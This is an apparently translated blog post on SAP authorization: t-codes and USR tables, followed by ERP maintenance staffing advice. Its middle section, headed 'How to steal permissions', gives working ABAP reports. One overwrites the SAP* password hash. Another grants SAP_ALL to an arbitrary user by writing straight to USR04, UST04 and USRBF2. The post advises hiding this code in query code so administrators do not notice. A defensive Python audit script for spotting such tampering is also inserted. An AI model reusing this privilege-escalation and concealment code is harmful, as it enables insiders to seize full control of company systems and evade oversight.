SAP user permissions and cracking: vigilance

Anatomy of SAP user permissions. Basis usually uses PFCG for permission management; when you save, a non-system profile name is generated. Do you remember that a user in SU01 has two columns, Profile and Role? How are they related? First, a few concepts.

1. Activity. Let's start with "activity"; look it up in a dictionary and you get the idea. It defines which action may be performed. For example, you may only drink alcohol, and no more than two (no, that is what my wife says). SAP is not like that: it is only insert, update, display and so on. The Germans stored these in table TOBJ. Activities can also be grouped into activity groups.

2. Activity category and authorization group; role vs. profile. Look at table T020 and you will see what K, D, A, M and so on mean. What is a profile? It can be understood as the name of a set of all authorization data (made up of many authorization groups {which you can fill in with OBA7; permissions that are too fine-grained are not a good thing ^_^} and activities). Generally, a custom role generates a profile. SAP permission control is based on the authorization data (objects) in the profile. What is a role? A role is just a name to which a profile is assigned. For example, if you create a user in SU01 without any role but add a profile such as SAP_ALL, that user can do anything. SAP itself ships many default roles and profiles.

3. The most common path: PFCG -> Authorizations -> Change authorization data -> after entering, Selection criteria. There you can see all authorization objects and add them manually. For example, if an authorization error occurs when you use a t-code, the ABAPer uses SU53 to check which authorization object is missing and then adds it manually.
If you select authorization levels, you can subdivide permissions by account type; some even go directly down to table fields. You can even allocate a buffer for an object. So how does SAP implement permission control? We will get to that.

4. Several t-codes about permissions.

(1) Role-related t-codes: PFAC (standard), PFAC_CHG (change), PFAC_DEL (delete), PFAC_DIS (display), PFAC_INS (new), PFAC_STR, PFCG (create role), ROLE_CMP (compare), SUPC (batch-create role profiles), SWUJ (test), SU03 (check authorization data), SU25 / SU26 (check updated profiles).

(2) User-related t-codes: SU0, SU01, SU01D, SU01_N ***, SU05, SU50, SU51, SU52, SU1, SU10 (mass), SU12 (mass), SUCOMP (maintain user company address), SU2 (change user parameters), SUIM (user information system). User groups: SUGR (maintain), SUGRD (display), SUGRD_N *** (or maintain), SUGR_N *** (or display).

(3) Profile and authorization data: SU02 (create a profile directly without a role), SU20 (subdivided authorization fields), SU21 (SU03) *** (maintain authorization objects; tables TOBJ, USR12). For accounting documents, for example, you can see: F_BKPF_BED: accounting document: account authorization for customers; F_BKPF_BEK: accounting document: account authorization for vendors; F_BKPF_BES: accounting document: account authorization for G/L accounts; F_BKPF_BLA: accounting document: authorization for document types; F_BKPF_BUK: accounting document: authorization for company codes; F_BKPF_BUP: accounting document: authorization for posting periods; F_BKPF_GSB: accounting document: authorization for business areas; F_BKPF_KOA: accounting document: authorization for account types; F_BKPF_VW: accounting document: change default values for doc. type / posting key. You can segment these further. These entries are saved in USR12; at the DB layer it is UTAB. Subdivision by transaction code: SU22, SU24. SU53: *** used to check which authorization object is missing. SU56: analyze authorization data buffers.
SU87: check the history of user changes; SU96, SU97, SU98, SU99? SUPC: generate role profiles in batch. DB and logical layers: SUKRI: transaction combinations critical for security. Tables: TOBJ: all available authorization objects (all of them are here). USR12: user-level authorization values.

USR01: master data; USR02: passwords; USR04: authorizations; USR03: user address data; USR05: user master parameter IDs; USR06: additional data per user; USR07: object/values of the last authorization check that failed; USR08: table for user menu entries; USR09: entries for user menus (work areas); USR10: user master authorization profiles; USR11: user master texts for profiles (USR10); USR12: user master authorization values; USR13: short texts for authorizations; USR14: surchargeable language versions per user; USR15: external user name; USR16: values for variables for user authorizations; USR20: date of last user master reorganization; USR21: assign user name address key; USR22: logon data without kernel access; USR30: additional information for user menu; USR40: table for illegal passwords; USR41: current user; USREFUS; USRBF2; USRBF3; UST04: user profiles (here); UST10C: composite profiles; UST10S: single profiles; UST12: authorizations (for the role).

How to steal permissions

User type (not to mention what it is for): the common user types are A. Dialog (normal user), B. Communication, C. System, D. Service, E. Reference. Usually you must pass a permission check before using any t-code. AUTHORITY_CHECK: this function only checks whether your user has expired; ** if you are coding, you only need this function. AUTHORITY_CHECK_TCODE: checks the t-code. The compiled check actually tests authorization objects. SUSR_USER_AUTH_FOR_OBJ_GET; AUTHORIZATION_DATA_READ_SELOBJ.

It is very simple to change the password of SAP* to 123.
We can find the user logon table USR02. (df52478e6ff90eeb is the value as encrypted by SAP; has anyone studied how SAP encrypts passwords in the database?)

REPORT zmodsap.
DATA zusr02 LIKE usr02.
SELECT SINGLE * INTO zusr02 FROM usr02 WHERE bname = 'SAP*'.
zusr02-bcode = 'df52478e6ff90eeb'.
UPDATE usr02 FROM zusr02.

The problem now is how to keep your basis from seeing it. It is very simple: hide the code in a query. That is, if you create a query, the query generates code, and you add this code to it; who would think of that??? Then you wait for your basis to cry... so cool. I suggest you secretly create your own users. Here you must have a clear picture of the permission structure. Permissions involve three tables: a. USR04, b. UST04, c. USRBF2 (which corresponds to the authorization objects used).

*&---------------------------------------------------------------------*
*& Report: steal sap all right
*& Creation date: 2004.04.01
*& Created by: Stone.fu
*& Description: You can steal sap all permissions
*& Modified date: 2005.11.02
*& Description: Run this code hidden in Report Painter or query code
*&---------------------------------------------------------------------*
REPORT zrightsteal.
DATA zusr04 LIKE usr04.                               "work area
DATA zust04 LIKE usr04.
DATA zprofs LIKE usr04-profs.
DATA zusrbf2 LIKE usrbf2 OCCURS 0 WITH HEADER LINE.  "USRBF2 internal table
* update authorization table USR04
SELECT SINGLE * INTO zusr04 FROM usr04 WHERE bname = 'ZABC2'.
MOVE 'C SAP_ALL' TO zprofs.                            "SAP_ALL profile
zusr04-nrpro = '14'.
zusr04-profs = zprofs.
UPDATE usr04 FROM zusr04.
* update user authorization master table UST04
SELECT SINGLE * INTO zust04 FROM ust04 WHERE bname = 'ZABC2'.
zust04-profile = 'SAP_ALL'.                            "SAP_ALL profile
UPDATE ust04 FROM zust04.
* insert variant:
* zust04-mandt = '20140901'.
* zust04-bname = 'ZABC2'.
* zust04-profile = 'SAP_ALL'.
* INSERT ust04 FROM zust04.
SELECT * FROM usrbf2 INTO TABLE zusrbf2 WHERE bname = 'SAP*'.
LOOP AT zusrbf2.
  zusrbf2-bname = 'ZABC2'.
  MODIFY zusrbf2 INDEX sy-tabix TRANSPORTING bname.
ENDLOOP.
INSERT usrbf2 FROM TABLE zusrbf2 ACCEPTING DUPLICATE KEYS.

Create a ZTEST user without any permissions and run report ZRIGHTSTEAL on the test machine; ZTEST then has SAP_ALL. Then you hide the code in the SAP query code. ABAP code is too easy to detect. In fact, SAP* is locked when you change the password of SAP*. The user running this program must have the corresponding permissions in S_PROGRAM or S_QUERY.

Published by Niuchao on 2007.09.28. Category: SAP.

September 25, 2007. For SAP projects, people often say a lot about the people the project needs: each module has an internal consultant and a developer, and Basis and clerks are counted as well. How can this problem be solved? That scale is daunting. However, an SAP project does not need much adjustment for a long time after go-live; as an internal consultant, you mainly need to keep learning: new knowledge for improvement or expansion. Problems at this stage are mainly caused by insufficient user skills. Through reasonable allocation of personnel, small and medium-sized enterprises can greatly reduce their investment in people; for an SME, the internal consultants for an SAP project can reasonably be kept to around 5-6 people.

Internal ERP maintenance is divided into four layers. The first layer is the system application layer, which mainly deals with operation-level problems, for example a wrong price entered on a purchase order or a wrong date entered on a goods receipt. Problems at this level can usually be solved by key users; they show up mostly as process and permission issues. You only need to grant key users the permission to correct the records.
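As an added defender-side example (not part of the original post), the following Python script audits exported USR04 and UST04 rows for the kind of direct table manipulation the report above performs: it decodes the USR04.PROFS entries, flags SAP_ALL/SAP_NEW on any user outside an approved admin list, and flags users whose USR04 and UST04 profile assignments no longer agree. The 14-byte PROFS entry layout (2-byte kind marker plus profile name, NRPRO counting 14 per entry) is an assumption taken from the report's own MOVE/NRPRO lines, and all sample rows are constructed.

```python
"""Audit constructed USR04/UST04 exports for direct profile manipulation (added example)."""
from collections import defaultdict

ENTRY_LEN = 14   # assumed layout, from the page's report: 2-byte kind marker + 12-byte profile name
CRITICAL_PROFILES = {"SAP_ALL", "SAP_NEW"}

def decode_profs(nrpro: int, profs: str) -> list:
    """Split USR04.PROFS into profile names; NRPRO is taken as the byte length in use."""
    names = []
    for off in range(0, nrpro, ENTRY_LEN):
        name = profs[off + 2:off + ENTRY_LEN].strip()   # skip the 2-byte marker ("C ")
        if name:
            names.append(name)
    return names

def audit(usr04_rows, ust04_rows, approved_admins=frozenset()):
    """Return (user, finding) tuples: critical profiles on non-admins and USR04/UST04 drift."""
    findings = []
    ust04 = defaultdict(set)
    for bname, profile in ust04_rows:
        ust04[bname].add(profile)
    for bname, nrpro, profs in usr04_rows:
        assigned = set(decode_profs(nrpro, profs))
        for prof in sorted(assigned & CRITICAL_PROFILES):
            if bname not in approved_admins:
                findings.append((bname, f"critical profile {prof} outside approved admin list"))
        if assigned != ust04[bname]:
            findings.append((bname, f"USR04/UST04 mismatch: {sorted(assigned)} vs {sorted(ust04[bname])}"))
    # UST04 rows for a user that has no USR04 master record at all
    for bname in sorted(ust04.keys() - {row[0] for row in usr04_rows}):
        findings.append((bname, "UST04 rows without USR04 master record"))
    return findings

# Constructed sample rows (BNAME, NRPRO, PROFS) and (BNAME, PROFILE); not real data.
SAMPLE_USR04 = [
    ("BASISADM", 28, "C SAP_ALL     C SAP_NEW     "),
    ("ZABC2",    14, "C SAP_ALL     "),
    ("JSMITH",   14, "C Z_FI_DISP   "),
]
SAMPLE_UST04 = [
    ("BASISADM", "SAP_ALL"), ("BASISADM", "SAP_NEW"),
    ("ZABC2", "SAP_ALL"),
    ("JSMITH", "Z_FI_DISP"), ("JSMITH", "Z_FI_POST"),
]

if __name__ == "__main__":
    for user, finding in audit(SAMPLE_USR04, SAMPLE_UST04, {"BASISADM"}):
        print(f"{user}: {finding}")
```

Run against real exports, the approved-admin set should come from the change-request records so that a SAP_ALL holder such as the ZABC2 row above stands out even when both tables were updated consistently.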
If an error occurs, a dedicated person can correct the records. This is part of daily work. I have compiled statistics on the following issues, which account for more than 70% of system problems: 1. Data not entered on time, or missing, due to user reasons. 2. Incorrect data, especially amounts and dates, due to unskilled operation. 3. Errors caused by process coordination issues.

The second level is system configuration. Problems at this level arise when users need to add data such as warehouses, plants and order types. Because of the large impact on the system, only internal consultants may maintain this data. When the system has been running for some time and needs to be optimized, upgraded or expanded in management terms, internal consultants need to reconfigure the system; however, the configuration workload is usually not heavy. That is a special case.

Level 3 is system development, which is divided into two stages. The first stage is system reports; generally, after go-live the demand for report development is relatively large. After the system has run stably for a period, users' functional requirements gradually increase, and the second stage begins: development of system functions. Of course, SAP itself is a relatively complete system, so development work is mostly interfaces with other systems. The first stage is within the scope of routine maintenance; the second stage is a special case, and the ERP project manager must communicate with the users.

Level 4 is system security and backup. Basis is usually responsible for this maintenance, including user authorization, system backup and performance optimization. This is part of daily work. From the above, as long as a hierarchical maintenance system is established, the number of consultants can be minimized.
The following divides the responsibilities of the different personnel in order to optimize the organizational structure of the ERP project.

1. Key users are designated by department clerks or department leaders. They are mainly responsible for solving all problems occurring at the operation level of their department or module. They must have the following basic qualities: A. Understand the operating processes and responsibilities of the department. B. Understand all of the department's operations in the ERP project. C. Record and archive all problems encountered during system operation. D. Answer questions raised by end users and report unsolved questions to the internal consultant in a timely manner. Key users need to summarize system problems so that problem handling can be standardized. In this way a large number of basic problems can be solved in the shortest time, which reduces the internal consultants' workload, so that their daily work becomes report development and in-depth study of system functions. Each department provides at least one key user. A key user's time split between the original department and the ERP project is about 2 to 1. You could consider giving each key user an extra salary of - yuan, but they must be assessed effectively.

2. Internal consultant (module consultant). The internal consultant mainly comes from the IT department and must have the following qualities: A. Familiar with the ERP product and with the basic configuration of the module in charge, and able to study the extended functions of that module thoroughly. B. Assist colleagues in maintaining a second module as arranged by the company, gradually mastering the basic configuration of that module. C. Responsible for the secondary development of this module's functions.
For cross-module development, the project manager arranges the division of labor with the other consultants. D. Collect and sort all problems encountered in this module, analyze and summarize them, submit a summary report regularly, and submit improvement suggestions based on that report. E. Regular training for key ERP users and end users, especially on the problems encountered in practice. F. Responsible for implementing the ERP project at branches and guiding the relevant branch staff to adopt the ERP system correctly. Configuration covers four parts, PP, MM, SD and FI/CO, so four internal consultants are required.

3. System consultant (technical consultant). The system consultant is mainly responsible for permission management, system maintenance and performance optimization of the ERP system, and must have the following qualities: a. Understand and master the software and hardware of the company's ERP system, especially host maintenance and management; back up the system regularly to ensure normal, stable operation. B. Log on to the ERP service website, follow system updates in a timely manner, and apply functional or security patches promptly. C. Have a deep understanding of the operating system's optimization and monitoring functions, anticipating possible problems where feasible; monitoring the system's disk space and memory usage is particularly important. D. Master the ERP system's permission management function, and add or remove permissions for users based on the user's application and the lead's approval. E. Register system problems on the ERP service websites (such as the SAP OSS website and the Oracle MetaLink website) and relay their feedback to the relevant consultants promptly. An enterprise must have one full-time technical consultant.
Through the above arrangement, we establish a three-level support system: key users -> internal consultants -> technical consultant. Operation-level problems should be solved at the key-user level as far as possible, and system configuration and optimization problems at the internal-consultant level. When the internal consultant cannot solve a problem, the technical consultant seeks help on the ERP service website. At the same time, the internal consultants are arranged for mutual cooperation and redundancy: each consultant is mainly responsible for one module and assists with another, and the modules are swapped every six months to a year. In this way, when a consultant leaves, another can quickly take over his or her work and prevent a service interruption. More importantly, ERP service talent can be cultivated and discovered among the key users. Those who are interested in maintaining the system and have a certain understanding of it are given room to be promoted to internal consultant, so when the company's ERP implementation department needs to expand, it can promote from this group at any time.

In terms of time, the internal consultant's work falls into three major stages. Stage 1: during ERP implementation, the internal consultant needs to quickly learn the front-end and back-end functions of the ERP product, master the maintenance skills of the ERP system, and take over basic system maintenance after the external consultants leave. Stage 2: within six months after go-live, internal consultants should record and sort out the problems encountered during the launch and develop simple reports.
Stage 3: after the ERP system is stable, internal consultants need to evaluate the implementation results of the ERP project and expand the ERP system's application according to senior management's requirements for the project. For SAP products alone, only three to four maintenance staff are needed after go-live. For example, Lenovo has over 300 internal consultants. Whether more or fewer consultants are needed mainly depends on the company's positioning of the ERP product: whether more in-depth application is required (the more application modules, the more consultants are needed), whether it must interface with other systems, and whether the enterprise has special requirements (custom development of special functions). From the actual situation of XX, I think five consultants is right. Of course, for the relatively difficult PP and FI/CO modules, you can consider external recruitment of people with some experience.
(This article comes from Niuchao's space.)